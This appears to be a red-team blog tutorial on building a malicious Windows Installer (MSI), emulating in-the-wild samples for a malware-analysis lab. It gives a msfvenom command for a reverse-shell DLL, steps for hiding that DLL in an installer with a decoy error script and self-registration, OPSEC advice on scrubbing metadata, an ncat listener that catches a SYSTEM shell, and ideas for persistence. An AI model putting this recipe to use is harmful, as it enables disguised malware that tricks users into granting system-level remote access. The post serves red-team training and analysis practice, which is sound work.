Build MSI delivered malware like the cool kids! Everybody’s doing it!
@July 16, 2022
I completed an engagement recently where I designed my threat plan around the recent rash of malicious Windows Installer (Microsoft Installer, or MSI) programs. It ended up being a blast, so I wanted to review my methodology for building this type of malware and what it looks like from the defender’s perspective.
I also released a malicious MSI as part of my most recent PMAT Lab update, so this post will probably be a good place to start if you want to tackle that challenge.
Real MSIs Realize Real MS-Lies
^^ I’m extremely proud of that header.
You’re familiar with MSIs if you’ve ever installed anything on Windows. MSI presents the GUI for installing some of your favorite productivity programs, like Napster, uTorrent, or Limewire. Or Notepad++, if you’re a psycho.
It’s a program that looks like this, you know the one:
The basic idea here is to package malware into an MSI and either:
- Have the user install it under the pretense that it’s a legitimate application…
- …have the MSI execute malware as part of the install process and then fabricate some kind of error to reduce suspicion from the user that it’s malware.
Both of these are interesting to me. Both of them have the same general setup. The end result is generally the same, but they both have slightly different approaches. We’ll examine the method outlined in the second bullet point.
Let’s look at an example that we can try to emulate:
The original tweet by proxylife has the high-level chain of execution, while the reply from Germán Fernández shows some details that we can use to improve the fidelity of emulation. Let’s get to work!
Emulation Station: Building an MSI
How do we build one of these things?
First, you’ll need Visual Studio.
Visual Studio 2022 | Download for free
Visual Studio 2022 | Visual Studio Share more than screens Live Share's real-time collaboration sessions speed up your team's edit and debugging cycles, no matter the language or platform. Personalized sessions with access controls and custom editor settings make sure everyone stays code-consistent.
I’m using VS 2022, but I have used VS 2019 in the past and this technique has worked out fine.
Once you have VS set up, we need to install an extension so we can build MSIs. Go find the Microsoft Visual Studio Installer Projects extension for the version of VS that you have. I’m using VS 2022, so I’m using the extension for 2022:
Microsoft Visual Studio Installer Projects 2022 - Visual Studio Marketplace
This extension provides the same functionality that currently exists in Visual Studio 2019 for Visual Studio Installer projects. To use this extension, you can either open the Extensions and Updates dialog, select the online node, and search for "Visual Studio Installer Projects," or you can download directly from this page.
Download, double-click, and run the extension installer. If all goes well, restart VS and you should now have the option to build Setup Projects.
Select the Setup Project option and name it something inconspicuous:
The UI for the Setup Project is a lot different than the normal VS UI. There’s not much in the way of coding to be done here. Instead, you now have a set of installation directories:
On the right side of VS, the project can be built like any other VS solution. We’ll add the files that we want installed, tell the installer where to drop them during installation, add some custom actions 😲 to do our dirty work, and then build the dang thing as a pre-packaged installer of evil. 😈😈😈
Let’s revisit the emulation plan and take a look at the contents of the MSI:
(better pictures are available in the original tweet above ⬆️ )
The MSI contains a DLL, a .VBS file, and a few custom actions to execute. Let’s knock out the composite elements first and then set up the custom actions.
MsgBox "Error fam lmao", 16, "Somethin broke yo"
This part is trivial. Save this as a
.vbs and check that it runs by invoking it with
> wscript.exe vbc_notify.vbs
We need a malicious DLL. Let’s keep it simple and use a Windows reverse shell that connects back to the localhost on port 8443.
┌──(kali㉿kali)-[~/Desktop] └─$ msfvenom -p windows/x64/shell_reverse_tcp lhost=127.0.0.1 lport=8443 -f dll > dll_main.dll [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x64 from the payload No encoder specified, outputting raw payload Payload size: 460 bytes Final size of dll file: 8704 bytes
Once this is compiled, let’s test it to ensure the mechanics of the exploit are working as intended:
Now, let’s wrap these two composite elements up into our malicious installer. To do this, go to our project in VS and select the location where we want our installer to actually drop the files. The tweet references where the files are installed in the real sample:
regsvr32.exe -n -i:"Install" C:\Users\**\AppData\Local\AdobeFontPack\main.dll
Let’s use the AppData directory for our emulation. We can add this as a location by right clicking in the left-side pane and selecting
Add Special Folder -> User's Application Data Folder
Once the AppData directory is added to the list of available install locations, right-click on it and select
Add -> Files
Here, we add all of the composite elements of this exploit chain to the installer. Add the .VBS and dll_main.dll here.
Right now, nothing will happen when we run the installer after the DLL and .VBS are dropped into %APPDATA%. We now need to add some custom actions to complete the exploit chain. And this is where things get downright insidious.
First, go to
dll_main.dll in the Solution Explorer panel (right-side).
The sample installer calls
regsvr32.exe to register the DLL when installed for execution. We can set the DLL to self-register during install by selecting the
Now, right-click on the Project file (not the Solution file but the thing one level under it) in the Solution Explorer and go to
View -> Custom Actions (personally, I think this is a weird place for it but whatevs):
We can make the decoy
vbc_notify.vbs script run by adding it as a Custom Action to the Install folder:
Now when this program runs, it will:
- Unpack both resources into %APPDATA%
- Self register (i.e., execute)
vbc_notify.vbsand pop up a decoy message
- And, exit the installer!
Before compiling, make sure to change some of the Misc details like the Author and Company Name to preserve OPSEC. Select the Build Project file and change the settings in there:
Compile this into an MSI by right-clicking the Solution file and clicking “Build Solution”. If all has gone to plan, you should now have an MSI in the Debug or Release directory, depending on which build you selected:
Debug is fine for testing and demo purposes. Release is better in an OPSEC sense.
Eff Around Complete - Initiating “Find Out” Protocol
Start up your ncat listener:
> ncat.exe -nvlp8443 Ncat: Version 7.92 ( https://nmap.org/ncat ) Ncat: Listening on :::8443 Ncat: Listening on 0.0.0.0:8443
VS gives us a few options to run the actual installer: a standalone MSI and an executable. The MSI can be run by itself with no problems. If you use the setup executable, make sure to keep the MSI alongside it. If you separate the two files, you’ll get an error. Can’t have that!
This is because the
setup.exe application appears to be a wrapper around the actual installer. When the application is run, the MSI kicks off as a child process:
In any case, run the MSI or the installer and follow the prompts:
At some point in this install, you may have to accept a UAC prompt to ensure that you’re OK with a program making changes to your computer. Imagine that the user is a local admin on their own host. Or maybe they call up their IT admin and ask them to install the program because it’s an important business program.
Hey, there’s our decoy script! One interesting thing to note here is that the .VBS file is not forked into a new process. There is no new process as a child of any MSI process in the process tree:
We see that the
vbc_notify.vbs script has been registered as a COM object in the registry and can now be called by CLSID, which points it to the location on disk:
This ends up in the memory space of the new msiexec.exe, almost like a pseudo process injection 🤔 :
And if you check the ncat listener:
Accepting the UAC prompt means that this process has been executed with admin privileges. And Windows has taken that a step further and bumped us up to SYSTEM level. Yikes!
You can imagine how dangerous this can be with a bit of social engineering.
The resulting process relationship is interesting.
Rundll32 is used to open the resulting cmd.exe window and spawn the shell:
Important to note here is that this instance of
rundll32 does not spawn as a child of
explorer.exe. Rundll32 is a contentious topic in the OPSEC realm, so I’ll leave it up to you to decide if you’re ok with the OPSEC implications of this.
But also remember that there is tons of room for creativity with this technique. Do you install an application in the User Application Directory and then make a shortcut in the Startup Folder? Do you make some choice registry changes with nefarious intention? The sky is the limit.
I think that’s enough for today!
— — — — — — > Back to
🌐 Where You Can Find Me
TryHackMe | Weasel
I think the data science team has been a bit fast and loose with their project resources.
The Taggart Institute: Master Your Craft
Great hackers are good people. Many courses on red teaming will teach you the technical process of how to exploit targets. But seldom do courses cover what it means to carry out the role of a red teamer responsibly.
TryHackMe | Takedown
We have reason to believe a corporate webserver has been compromised by RISOTTO GROUP. Cyber interdiction is authorized for this operation. Find their teamserver and take it down.
Practical Malware Analysis & Triage
Arm yourself with knowledge and bring the fight to the bad guys! Practical Malware Analysis & Triage (PMAT) brings the state of the art of malware analysis to you in engaging instructional videos and custom made, practical labs. Welcome to Practical Malware Analysis & Triage.
GitHub - HuskyHacks/PMAT-labs: Labs for Practical Malware Analysis & Triage
Welcome to the labs for Practical Malware Analysis & Triage. Read this carefully before proceeding. This repository contains live malware samples for use in the Practical Malware Analysis & Triage course (PMAT). These samples are either written to emulate common malware characteristics or are live, real world, "caught in the wild" samples.
📝Recent Blog Posts
TryHackMe: Takedown Walkthrough
This is the official walkthrough for this room. I did not cover every single detail available but do cover enough to get from start to finish. Obviously, major spoilers are ahead from here on out.
Malware Analysis Labs: Internal Network vs Host-Only
"If Host-Only mode allows a VM to route to the physical host in some circumstances, can it really be considered safe for malware analysis?" I applaud my students for approaching me about this because it means they are thinking critically about safety during malware analysis.
How To HACK Your EX'S SOCIAL MEDIA ACCOUNTS (REAL GUIDE)
What better way to get revenge than to your ? That's where I, 0xTastyyboi, come in. I'm going to show you all that you need to know to EX'S SOCIAL MEDIA ACCOUNTS your . EX'S SOCIAL MEDIA ACCOUNTS ... Kali doesn't have notepad.exe ? What the hell is...
Red Team Infrastructure Done Right
You may be familiar with Tim MalcomVetter's blog post on Safe Red Team Infrastructure , where he lays out the high level overview of how to make a safe red team operational network. That post changed my life, but it did lack the technical details on how to do this process in a practical sense.
We Put A C2 In Your Notetaking App: OffensiveNotion
Notion is a popular notetaking application. It has lots of great features that make notetaking a snap. Some of the features we love the most include the capability to share notebooks across teams, push notes to cloud storage, build custom templates, and, in general, deck out your pages so they feel like they have lots of personality!
DLL Hijacking & DLL Proxying An SNES Emulator
Time: 30 mins Difficulty: Beginner Skills: Custom Exploit Development, DLL Hijacking 30 minute exploit dev post. Let's get it. I fell down another security research rabbit hole and when I snapped out of it, I found myself.... ...playing Chrono Trigger? Wait, what? That program in the picture is an SNES Emulator and, if you're like...